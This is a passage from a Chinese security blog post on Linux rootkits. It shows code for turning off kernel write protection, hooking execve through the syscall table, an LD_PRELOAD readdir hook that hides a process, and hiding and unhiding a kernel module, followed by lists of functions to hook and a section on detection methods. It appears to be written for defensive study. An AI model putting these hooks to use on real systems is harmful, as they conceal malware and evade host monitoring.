<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">void</span><br><span class="line">disable<span class="constructor">_wp(<span class="params">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    unsigned long cr0;</span><br><span class="line">    preempt<span class="constructor">_disable()</span>;</span><br><span class="line">    cr0 = read<span class="constructor">_cr0()</span>;</span><br><span class="line">    clear<span class="constructor">_bit(X86_CR0_WP_BIT, &amp;<span class="params">cr0</span>)</span>;</span><br><span class="line">    write<span class="constructor">_cr0(<span class="params">cr0</span>)</span>;</span><br><span class="line">    preempt<span class="constructor">_enable()</span>;</span><br><span class="line">    return;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>系统调用表在内核中是只读的，直接修改内存会导致内核oops；修改系统调用表需要暂时关闭系统的内存写保护，这块内核有api可以直接调用，不需要写内联汇编；内存读写保护状态保存在cr0寄存器中，在调用相关函数设置cr0寄存器bit置位时需提前加自旋锁，防止被内核抢占，避免执行内存写保护关闭过程中出现内核安全/稳定性风险。</p>
<p><strong>系统调用覆写</strong></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_execve(<span class="keyword">const</span> <span class="keyword">char</span> __user *filename,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *argv,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *envp);</span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">(*real_execve)(<span class="keyword">const</span> <span class="keyword">char</span> __user *filename,</span><br><span class="line">               <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *argv,</span><br><span class="line">               <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *envp);</span><br></pre></td></tr></table></figure>

<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage long</span><br><span class="line">fake_execve(<span class="keyword">const</span> <span class="keyword">char</span> __user *filename,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *argv,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *envp)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">char</span> *<span class="keyword">args</span>;</span><br><span class="line">    <span class="keyword">char</span> *buff = kmalloc(PAGE_SIZE, GFP_KERNEL);</span><br><span class="line">    <span class="keyword">if</span> (buff) &#123;</span><br><span class="line">        <span class="keyword">args</span> = join_strings(argv, <span class="string">" "</span>, buff, PAGE_SIZE);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">args</span> = (<span class="keyword">char</span> *)argv[0];</span><br><span class="line">        buff = NULL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    fm_alert(<span class="string">"execve: %s\n"</span>, <span class="keyword">args</span>);</span><br><span class="line"></span><br><span class="line">    kfree(buff);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_execve(filename, argv, envp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>定义两个函数指针，分别用来指向原生/伪造的系统调用函数，伪造函数自实现逻辑。</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># define HOOK_SCT(sct, name)                    \</span><br><span class="line">    do &#123;                                        \</span><br><span class="line">        real_##name = (void *)sct[__NR_##name]; \</span><br><span class="line">        sct[__NR_##name] = (void *)fake_##name; \</span><br><span class="line">    &#125; while (<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"># define UNHOOK_SCT(sct, name)                  \</span><br><span class="line">    sct[__NR_##name] = (void *)real_##name</span><br></pre></td></tr></table></figure>

<p>替换系统调用表中的函数指针，同时将原生函数指针保存在变量中，方便后续函数尾部执行返回正常功能。</p>
<h4 id="0x03-libc-hook"><a href="#0x03-libc-hook" class="headerlink" title="0x03    libc hook"></a>0x03    libc hook</h4><p>libc hook本质与系统调用hook一致，不再赘述，linux上最有效的hook方式为ld_preload，为广大malware制作者所喜爱，ld_preload是linux系统的一个环境变量，可以影响程序运行时的动态链接，允许程序运行时优先加载ld_preload文件中自定义的函数。</p>
<p>相比lkm，其有两个优点：<br>1、简单</p>
<p>2、稳定</p>
<p>简单是因为相对相对lkm，ld_preload的应用场景是在用户态，更偏向用户态常用的linux c编程；稳定是因为系统提供的机制，不用像lkm一样需要关注不同内核版本间的兼容性问题，侵入性相对hook系统调用改系统调用表要小很多，稳定性好。demo如下：</p>
<p><img src="./image-20200911021546937.png" alt="image-20200911021546937"></p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#define DECLARE_READDIR(dirent, readdir)                                \</span></span><br><span class="line">static struct dirent* (*original_<span class="comment">##readdir)(DIR*) = NULL;               \</span></span><br><span class="line">                                                                        <span class="string">\</span></span><br><span class="line">struct dirent* readdir(DIR *dirp)                                       <span class="string">\</span></span><br><span class="line">&#123;                                                                       <span class="string">\</span></span><br><span class="line">    <span class="keyword">if</span>(original_<span class="comment">##readdir == NULL) &#123;                                    \</span></span><br><span class="line">        original_<span class="comment">##readdir = dlsym(RTLD_NEXT, #readdir);               \</span></span><br><span class="line">        <span class="keyword">if</span>(original_<span class="comment">##readdir == NULL)                                  \</span></span><br><span class="line">        &#123;                                                               <span class="string">\</span></span><br><span class="line">            fprintf(stderr, <span class="string">"Error in dlsym: %s\n"</span>, dlerror());         <span class="string">\</span></span><br><span class="line">        &#125;                                                               <span class="string">\</span></span><br><span class="line">    &#125;                                                                   <span class="string">\</span></span><br><span class="line">                                                                        <span class="string">\</span></span><br><span class="line">    struct dirent* dir;                                                 <span class="string">\</span></span><br><span class="line">                                                                        <span class="string">\</span></span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)                                                            <span class="string">\</span></span><br><span class="line">    &#123;                                                                   <span class="string">\</span></span><br><span class="line">        dir = original_<span class="comment">##readdir(dirp);                                 \</span></span><br><span class="line">        <span class="keyword">if</span>(dir) &#123;                                                       <span class="string">\</span></span><br><span class="line">            char dir_name[<span class="number">256</span>];                                         <span class="string">\</span></span><br><span class="line">            char process_name[<span class="number">256</span>];                                     <span class="string">\</span></span><br><span class="line">            <span class="keyword">if</span>(get_dir_name(dirp, dir_name, sizeof(dir_name)) &amp;&amp;        <span class="string">\</span></span><br><span class="line">                strcmp(dir_name, <span class="string">"/proc"</span>) == <span class="number">0</span> &amp;&amp;                       <span class="string">\</span></span><br><span class="line">                get_process_name(dir-&gt;d_name, process_name) &amp;&amp;          <span class="string">\</span></span><br><span class="line">                strcmp(process_name, process_to_filter) == <span class="number">0</span>) &#123;         <span class="string">\</span></span><br><span class="line">                <span class="keyword">continue</span>;                                               <span class="string">\</span></span><br><span class="line">            &#125;                                                           <span class="string">\</span></span><br><span class="line">        &#125;                                                               <span class="string">\</span></span><br><span class="line">        <span class="keyword">break</span>;                                                          <span class="string">\</span></span><br><span class="line">    &#125;                                                                   <span class="string">\</span></span><br><span class="line">    <span class="keyword">return</span> dir;                                                         <span class="string">\</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这边hook了libc中的readdir，用来对应用程序调readdir解析vfs数据显示的进程进行过滤，尾部同lkm，返回时执行原生函数逻辑。</p>
<h3 id="通用的rootkit攻击手法"><a href="#通用的rootkit攻击手法" class="headerlink" title="通用的rootkit攻击手法"></a>通用的rootkit攻击手法</h3><p>常见rootkit涉及的攻击面：</p>
<p>1、进程</p>
<p>2、文件</p>
<p>3、网络</p>
<p>4、自身隐藏</p>
<p>5、else &amp; more</p>
<p><strong>进程</strong></p>
<p>用户态可以通过hook execv、execl、execle、execlp、execvp、fexecve等api劫持进程执行流程，达到程序执行的恶意重定向效果；针对一些hids通过hook execve等函数收集进程创建信息的行为，可以通过覆写execve进行bypass；lkm可以通过unlink task_struct节点达到进程隐藏的效果等等。</p>
<p><strong>文件</strong></p>
<p>用户态可以通过覆写readdir、unlink、access等函数对文件的读、写、执行进行控制，从而达到文件隐藏、进程（文件）执行控制、文件禁删除等效果，方便攻击者的后门程序可以非常顺利的在受害者主机驻留并难以被发现、清除；内核态一般hook getdents/getdents64两个系统调用。</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">usermode:</span><br><span class="line"><span class="keyword">readdir</span>、<span class="keyword">chdir</span>、fchdir、<span class="keyword">mkdir</span>、<span class="keyword">rmdir</span>、<span class="keyword">opendir</span>	...</span><br><span class="line"><span class="keyword">link</span>、<span class="keyword">unlink</span>、unlinkat、<span class="keyword">symlink</span>	...</span><br><span class="line">access、<span class="keyword">open</span>、openat、fopen	...</span><br><span class="line">create、fputs、fwrite	...</span><br><span class="line">fread	...</span><br><span class="line">kernelmode:</span><br><span class="line">getdents/getdents64	...</span><br></pre></td></tr></table></figure>

<p><strong>网络</strong></p>
<p>一般做主机/端口隐藏或者流量嗅探，常用hook函数：</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">socket</span>、<span class="keyword">connect</span>、<span class="keyword">accept</span>	...</span><br><span class="line"><span class="keyword">getservbyname</span>、<span class="keyword">getservbyport</span>、<span class="keyword">getservent</span>	...</span><br></pre></td></tr></table></figure>

<p><strong>自身隐藏</strong></p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">kernel mode:</span><br><span class="line">/proc/kallsyms &amp;&amp; /sys/module/</span><br><span class="line">list_del_init &amp;&amp; kobject_del</span><br><span class="line"></span><br><span class="line">user mode:</span><br><span class="line">hide ld_preload</span><br><span class="line">hide evil so</span><br><span class="line">can’t delete &amp;&amp; watch &amp;&amp; change</span><br></pre></td></tr></table></figure>

<p>lsmod本身是和ps、top这些程序一样解析/proc的，lsmod的数据来自于解析/proc/modules文件，而vfs中的数据是内核映射并格式化出来的，本质上来源于内核的modules struct内核模块链表，一般来说，常用的方式是在恶意lkm中使用list_del在载入内核后unlink掉内核链表中的此项，这样lsmod就无法查看到存在对应模块信息了；但是/sys/modules中还是能看到对应内核模块信息，个人理解是/proc/kallsyms和/sys/module是来自内核中两条相似的链表，其中一条派生自另一条（后面打算调一下），二者分用与不同功能；一般使用kobject_del删除模块对象之后，/sys/module中就没有对应内核模块信息了；同时，rmmod也无法检测到对应模块的存在，也就无法直接进行卸载；但可通过信号控制在脚本中动态地将内核模块信息加入对应内核模块链表，达到一个完整的控制效果。</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">module</span><span class="constructor">_show(<span class="params">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="built_in">list</span><span class="constructor">_add(&amp;THIS_MODULE-&gt;<span class="params">list</span>, <span class="params">module_previous</span>)</span>;</span><br><span class="line">        kobject<span class="constructor">_add(&amp;THIS_MODULE-&gt;<span class="params">mkobj</span>.<span class="params">kobj</span>, THIS_MODULE-&gt;<span class="params">mkobj</span>.<span class="params">kobj</span>.<span class="params">parent</span>,MODULE_NAME)</span>;</span><br><span class="line">        module_hidden = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用户态ld_preload本身比较简单，不再赘述。</p>
<p><strong>else &amp; more</strong></p>
<p><img src="./image-20200911033112456.png" alt="image-20200911033112456"></p>
<p>rootkit的利用手法并不只限于隐藏，linux原生功能可以做的，它同样能做；一些较好的开源项目对大量linux常用的api进行了分类并预留接口，由使用者进行逻辑的自定义和利用。</p>
<h2 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h2><h3 id="通用检测方式"><a href="#通用检测方式" class="headerlink" title="通用检测方式"></a>通用检测方式</h3><p><strong>LKM</strong></p>
<p>当前比较通用的几种检测：</p>
<p>1、进程事件检测</p>
<p>2、源码特征检测</p>
<p>3、符号特征检测</p>
<p>4、sys_call_table/idt完整性检测</p>
<p><strong>LD_PRELOAD</strong></p>
<p>1、文件事件检测</p>
<p>2、预加载白名单审计</p>
<p>3、静态编译对比检测</p>
<p>4、系统调用对比检测</p>
<p>5、task_struct链表信息对比</p>
<p>以上的检测方式都非常简单且限制很多，如lkm中第四点在2B的产品中难以被落地，ld_preload中不同进程列表对比去发现隐藏进程的方式会存在时延导致误报等等；但不可否认在可工程化的前提下以上检测手段结合使用是能产生效果的。</p>
<h3 id="开源项目"><a href="#开源项目" class="headerlink" title="开源项目"></a>开源项目</h3><p>针对rootkit这块的经典项目github上只看到两个：</p>
<p>1、chkrootkit</p>
<p>2、rkhunter</p>
<p>两者都是针对文件完整性做检查，效果非常有限，相对来说rkhunter要比chkrootkit高级一些，无论是检测方式还是更新时间，后续将针对这两个项目输出源码分析。</p>
<h2 id="总结-amp-思考"><a href="#总结-amp-思考" class="headerlink" title="总结&amp;思考"></a>总结&amp;思考</h2><p>1、针对rootkit的检测想有一个较高准确率，则攻防双方至少要在同一层面</p>
<p>2、目前市场上99%的hids都是静态检测，对于rootkit检测的能力非常有限</p>
<p>3、未来攻防双方博弈的战场将会持续由用户态转向内核态</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://draveness.me/whys-the-design-syscall-overhead/" target="_blank" rel="noopener">https://draveness.me/whys-the-design-syscall-overhead/</a></p>
<p><a href="https://wohin.me/linux-rootkit-shi-yan-0004-ling-wai-ji-chong-xi-tong-diao-yong-gua-gou-ji-zhu/" target="_blank" rel="noopener">https://wohin.me/linux-rootkit-shi-yan-0004-ling-wai-ji-chong-xi-tong-diao-yong-gua-gou-ji-zhu/</a></p>
<p><a href="https://0xax.gitbooks.io/linux-insides/content/SysCall/" target="_blank" rel="noopener">https://0xax.gitbooks.io/linux-insides/content/SysCall/</a></p>
<p><a href="http://arthurchiao.art/blog/system-call-definitive-guide-zh/" target="_blank" rel="noopener">http://arthurchiao.art/blog/system-call-definitive-guide-zh/</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1073909" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1073909</a></p>
<p><a href="https://vvl.me/2019/06/linux-syscall-and-vsyscall-vdso-in-x86/" target="_blank" rel="noopener">https://vvl.me/2019/06/linux-syscall-and-vsyscall-vdso-in-x86/</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%BA%8C%E8%BF%9B%E5%88%B6/" rel="tag"># 二进制</a>
              <a href="/tags/%E6%94%BB%E9%98%B2/" rel="tag"># 攻防</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/08/30/Netstat-Source-Code-Debug/" rel="prev" title="Netstat Source Code Debug">
                  <i class="fa fa-chevron-left"></i> Netstat Source Code Debug
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/09/19/elasticsearch-kibana%E5%85%A5%E9%97%A8%E5%AD%A6%E4%B9%A0/" rel="next" title="elasticsearch & kibana入门学习">
                  elasticsearch & kibana入门学习 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
  
  
  



      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">XDW</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>



    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  















  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  

</body>
</html>
